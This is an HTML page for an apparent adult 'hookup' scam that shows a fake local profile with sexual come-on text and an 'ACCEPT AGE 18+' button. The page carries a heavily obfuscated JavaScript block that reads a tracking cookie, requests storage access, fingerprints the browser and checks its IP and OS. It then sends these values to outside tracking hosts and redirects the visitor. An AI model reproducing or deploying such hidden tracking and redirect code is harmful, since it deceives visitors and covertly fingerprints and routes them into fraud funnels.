<!DOCTYPE html>
<html lang="en-US">
<head>
  <!-- Google tag (gtag.js) -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-84HX2Q5WT2"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'G-84HX2Q5WT2');
  </script>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
  <title>Best One Night Hookup Fun</title>
  <meta name="viewport" content="user-scalable=false, initial-scale=1.0, maximum-scale=1.0">
  <link href="favicons/-9523-jump-favicon.ico" rel="icon" type="image/x-icon">
  <meta content="nafialove24" name="keywords">
  <meta content="nafialove24" name="description">
  <link rel="stylesheet" type="text/css" href="css/main-style.css">
  <style type="text/css">.backpack.dropzone {
  font-family: 'SF UI Display', 'Segoe UI';
  font-size: 15px;
  text-align: center;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  width: 250px;
  height: 150px;
  font-weight: lighter;
  color: white;
  will-change: right;
  z-index: 2147483647;
  bottom: 20%;
  background: #333;
  position: fixed;
  user-select: none;
  transition: left .5s, right .5s;
  right: 0px; }
  .backpack.dropzone .animation {
    height: 80px;
    width: 250px;
    background: url("https://rogeelove24.live/chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.html") left center; }
  .backpack.dropzone .title::before {
    content: 'Save to'; }
  .backpack.dropzone.closed {
    right: -250px; }
  .backpack.dropzone.hover .animation {
    animation: sxt-play-anim-hover 0.91s steps(21);
    animation-fill-mode: forwards;
    background: url("https://rogeelove24.live/chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/hoverstate.html") left center; }

  @keyframes sxt-play-anim-hover {
  from {
    background-position: 0px; }
  to {
    background-position: -5250px; } }
  .backpack.dropzone.saving .title::before {
    content: 'Saving to'; }
  .backpack.dropzone.saving .animation {
    background: url("https://rogeelove24.live/chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saving_loop.html") left center;
    animation: sxt-play-anim-saving steps(59) 2.46s infinite; }

  @keyframes sxt-play-anim-saving {
  100% {
    background-position: -14750px; } }
  .backpack.dropzone.saved .title::before {
    content: 'Saved to'; }
  .backpack.dropzone.saved .animation {
    background: url("https://rogeelove24.live/chrome-extension_/lifbcibllhkdhoafpjfnlhfpfgnpldfl/assets/backpack/dropzone/saved.html") left center;
    animation: sxt-play-anim-saved steps(20) 0.83s forwards; }

  @keyframes sxt-play-anim-saved {
  100% {
    background-position: -5000px; } }
  </style>
  <script type="text/javascript" src="js/fp2.min.js"></script>
  <script src="localforage.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js" integrity="sha512-v2CJ7UaYy4JwqLDIrZUI/4hqeoQieOmAZNXBeQyjo21dadnwR+8ZaIJVT8EE2iyI61OV8e6M8PP2/4hpQINQ/g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
</head>
<body>
  <div id="wrapper">
    <!-- Main -->
    <section id="main">
      <header>
        <span class="avatar"><img style="max-width: 100%; width: 47%;" src="images/image2.jpg" alt="nafialove24"></span>
        <p>I'm Now Staying at <strong>
        <script language="Javascript" src="https://www.ip2phrase.com/ip2phrase.asp?template=%3CCITY%3E,%20%3CREGION%3E"></script><br></strong></p>
        <p><strong><b>Wellcome You To My Private Profile<br>
        I just wanna enjoy, Do you too?<br>
        Can I just be your private fuck doll?</b><br>
        Do you agree?</strong></p>
      </header>
      <footer>
        <!-- <input type="text" id="uid" placeholder="Enter Invite Code" required>
        <br /> -->
        <button type="submit" class="btn btn-success btn-lg stylee" id="submit"> ACCEPT AGE 18+ </button>
      </footer>
    </section>
</div>
<div class="video-container">
  <video class="bg-video" poster="https://nafialove24.live/bg-video-poster.html" autoplay="" loop="" muted="">
    <source src="https://nafialove24.live/video.mp4" type="video/mp4"></source>
  </video>
</div>
<script type="module">
  var _0x26cbcb=_0x49f2;function _0x49f2(_0x1be99f,_0x114be9){var _0x2d3d88=_0x2d3d();return _0x49f2=function(_0x49f2f9,_0x2228ef){_0x49f2f9=_0x49f2f9-0x13a;var _0x2d86bc=_0x2d3d88[_0x49f2f9];return _0x2d86bc;},_0x49f2(_0x1be99f,_0x114be9);}(function(_0x112394,_0xd06c46){var _0x54fb9a=_0x49f2,_0x454e3e=_0x112394();while(!![]){try{var _0x6fc0d6=-parseInt(_0x54fb9a(0x143))/0x1*(parseInt(_0x54fb9a(0x155))/0x2)+parseInt(_0x54fb9a(0x16f))/0x3*(-parseInt(_0x54fb9a(0x183))/0x4)+parseInt(_0x54fb9a(0x14e))/0x5+-parseInt(_0x54fb9a(0x15a))/0x6*(parseInt(_0x54fb9a(0x17c))/0x7)+-parseInt(_0x54fb9a(0x171))/0x8*(-parseInt(_0x54fb9a(0x147))/0x9)+-parseInt(_0x54fb9a(0x14d))/0xa*(-parseInt(_0x54fb9a(0x175))/0xb)+-parseInt(_0x54fb9a(0x141))/0xc*(-parseInt(_0x54fb9a(0x146))/0xd);if(_0x6fc0d6===_0xd06c46)break;else _0x454e3e['push'](_0x454e3e['shift']());}catch(_0x27f845){_0x454e3e['push'](_0x454e3e['shift']());}}}(_0x2d3d,0xb4d4e));var guid='',g='',ur='';import*as _0x9290e5 from'https://esm.run/detect-browser';const browser=_0x9290e5['detect']();function _0x2d3d(){var _0xa64a3e=['get','https://cnet.ageverify.org/api/traffic?campaign_id=1&user_id=','&hll=','10DoAvNp','94440VZUyne','Cookie\x20access\x20allowed.\x20Calling\x20requestStorageAccess()','https://adultfun.ageverify.org/15GK4T?model2=c69&uid=','requestStorageAccess\x20Error:','disabled','&osm=','Read\x20the\x20document\x20cookies:','1412234VzEGEU','version','requestStorageAccess','uid','value','8814kDwcte','&hlb=','query','&fp=','substring','Storage\x20Acccess\x20API\x20not\x20supported.\x20Assume\x20we\x20have\x20access.','Cookie\x20access\x20already\x20granted','os_mismatch','ready','Cookie\x20access\x20requires\x20a\x20prompt','Please\x20wait...','text','permissions:','charAt','finally','requestIdleCallback','referrer','https://tcpip.incolumitas.com/classify?by_ip=1','prompt','val','split','507219TBdGlD','cuid','64skbRjS','&hlo=','hasStorageAccess','chrome','2385493wKAHLI','Android','join','attr','then','indexOf','storage-access','2366pFwsBp','#uid','&clicks=yes','denied','Have\x20access\x20now\x20thanks\x20to\x20prompt','granted','storage-access\x20permission\x20not\x20supported.\x20Assume\x20no\x20access.','8uLYLqu','top','Cookie\x20access\x20denied','&hlt=','&external_id=','map','log','x64hash128','Cookie\x20access\x20granted','20794812eMLxfz','length','2mJxrxg','state','json','13PXBjLT','1146303UfHVtV','click','permissions'];_0x2d3d=function(){return _0xa64a3e;};return _0x2d3d();}var latest=0x77,hlb=![],hlo=![],osm=![];function fpGo(){Fingerprint2['get'](function(_0x30d550){var _0x204aa3=_0x49f2,_0x54dda7=_0x30d550[_0x204aa3(0x13d)](function(_0x8d3fce){var _0x4fb8a1=_0x204aa3;return _0x8d3fce[_0x4fb8a1(0x159)];}),_0x1322c9=Fingerprint2[_0x204aa3(0x13f)](_0x54dda7[_0x204aa3(0x177)](''),0x1f);g=g+_0x204aa3(0x15d)+_0x1322c9+_0x204aa3(0x14c)+_0x30d550[0x15]['value']+'&hlr='+_0x30d550[0x16]['value']+_0x204aa3(0x172)+_0x30d550[0x17][_0x204aa3(0x159)]+_0x204aa3(0x15b)+_0x30d550[0x18]['value']+_0x204aa3(0x13b)+_0x30d550[0x9][_0x204aa3(0x159)]+'&hlw='+_0x30d550[0x1][_0x204aa3(0x159)],window[_0x204aa3(0x184)]['location']['href']=g;});}function getChromeVersion(){var _0x485580=_0x49f2,_0x3f575f=browser['name']===_0x485580(0x174),_0x4e28f1=browser['os']['includes'](_0x485580(0x176));return _0x3f575f&&_0x4e28f1?parseInt(browser[_0x485580(0x156)],0xa):![];}function scoreCheck(){var _0xa7712=_0x49f2;fetch(ur)[_0xa7712(0x168)](()=>{var _0x4103bd=_0xa7712;window[_0x4103bd(0x169)]?requestIdleCallback(function(){fpGo();}):setTimeout(function(){fpGo();},0x1f4);});}function getCookie(_0x1ac527){var _0x293fbb=_0x49f2;let _0x262331=_0x1ac527+'=',_0x33a0b1=decodeURIComponent(document['cookie']),_0x556597=_0x33a0b1[_0x293fbb(0x16e)](';');for(let _0x1bf1db=0x0;_0x1bf1db<_0x556597[_0x293fbb(0x142)];_0x1bf1db++){let _0x976cd5=_0x556597[_0x1bf1db];while(_0x976cd5[_0x293fbb(0x167)](0x0)=='\x20'){_0x976cd5=_0x976cd5[_0x293fbb(0x15e)](0x1);}if(_0x976cd5[_0x293fbb(0x17a)](_0x262331)==0x0)return _0x976cd5[_0x293fbb(0x15e)](_0x262331[_0x293fbb(0x142)],_0x976cd5[_0x293fbb(0x142)]);}return'';}let hasAccess=![];function updateCookiesOutput(){var _0x32b3c3=_0x49f2;let _0x1a5f48=getCookie(_0x32b3c3(0x158));console[_0x32b3c3(0x13e)](_0x32b3c3(0x154),_0x1a5f48),guid=_0x1a5f48;}async function refreshCookies(){var _0x3a9f43=_0x49f2;if(!hasAccess){console['log']('Don\x27t\x20have\x20access.\x20Trying\x20again\x20within\x20this\x20click\x20handler,\x20in\x20case\x20it\x20needed\x20a\x20prompt.');try{await document[_0x3a9f43(0x157)](),hasAccess=!![],console[_0x3a9f43(0x13e)](_0x3a9f43(0x180));}catch(_0xbdc398){console[_0x3a9f43(0x13e)](_0x3a9f43(0x151),_0xbdc398);}hasAccess=await document[_0x3a9f43(0x173)](),console[_0x3a9f43(0x13e)]('Updated\x20hasAccess:',hasAccess);}updateCookiesOutput();}async function hasCookieAccess(){var _0x3726ec=_0x49f2;if(!document[_0x3726ec(0x157)])return console['log'](_0x3726ec(0x15f)),!![];if(await document[_0x3726ec(0x173)]())return console['log'](_0x3726ec(0x160)),!![];try{const _0x29fd51=await navigator[_0x3726ec(0x149)][_0x3726ec(0x15c)]({'name':_0x3726ec(0x17b)});console['log'](_0x3726ec(0x166),_0x29fd51);if(_0x29fd51[_0x3726ec(0x144)]===_0x3726ec(0x181))try{return console[_0x3726ec(0x13e)](_0x3726ec(0x14f)),await document[_0x3726ec(0x157)](),console['log'](_0x3726ec(0x140)),!![];}catch(_0x55000e){return![];}else{if(_0x29fd51[_0x3726ec(0x144)]===_0x3726ec(0x16c))return console[_0x3726ec(0x13e)](_0x3726ec(0x163)),![];else{if(_0x29fd51[_0x3726ec(0x144)]===_0x3726ec(0x17f))return console['log'](_0x3726ec(0x13a)),![];}}}catch(_0x586dda){return console['log'](_0x3726ec(0x182),_0x586dda),![];}return![];}async function handleCookieAccessInit(){hasAccess=await hasCookieAccess(),updateCookiesOutput();}handleCookieAccessInit(),$('#submit')[_0x26cbcb(0x148)](async()=>{var _0x4082b0=_0x26cbcb,_0x548729=$(_0x4082b0(0x17d))[_0x4082b0(0x16d)]();!_0x548729&&(await refreshCookies(),_0x548729=guid),_0x548729&&($('#submit')[_0x4082b0(0x165)](_0x4082b0(0x164))[_0x4082b0(0x178)](_0x4082b0(0x152),!![]),_0x548729=_0x548729[_0x4082b0(0x16e)]('_')[0x0][_0x4082b0(0x16e)]('-')[0x0][_0x4082b0(0x16e)]('@')[0x0],g=_0x4082b0(0x150)+_0x548729+_0x4082b0(0x13c)+_0x548729,ur=_0x4082b0(0x14b)+_0x548729+_0x4082b0(0x17e),fetch(_0x4082b0(0x16b))[_0x4082b0(0x179)](_0x20068b=>_0x20068b[_0x4082b0(0x145)]())[_0x4082b0(0x179)](_0xe078b9=>{var _0x37c0d3=_0x4082b0;g=g+_0x37c0d3(0x153)+_0xe078b9[_0x37c0d3(0x161)],osm=_0xe078b9[_0x37c0d3(0x161)],scoreCheck();}));}),$(document)[_0x26cbcb(0x162)](async()=>{var _0xa64771=_0x26cbcb,_0x4e5f11=document[_0xa64771(0x16a)];const _0x4dd8d5=new URL(_0x4e5f11);var _0x4c3a13=_0x4dd8d5['searchParams'][_0xa64771(0x14a)](_0xa64771(0x158));console[_0xa64771(0x13e)](_0x4c3a13),!_0x4c3a13&&(_0x4c3a13=getCookie(_0xa64771(0x158)),console[_0xa64771(0x13e)](_0xa64771(0x170),_0x4c3a13)),_0x4c3a13&&(g=_0xa64771(0x150)+_0x4c3a13+_0xa64771(0x13c)+_0x4c3a13,ur=_0xa64771(0x14b)+_0x4c3a13+_0xa64771(0x17e),fetch(_0xa64771(0x16b))[_0xa64771(0x179)](_0x1537e3=>_0x1537e3['json']())[_0xa64771(0x179)](_0x43c623=>{var _0x27adbb=_0xa64771;g=g+_0x27adbb(0x153)+_0x43c623[_0x27adbb(0x161)],osm=_0x43c623[_0x27adbb(0x161)],scoreCheck();}));});
</script>
</body>
</html>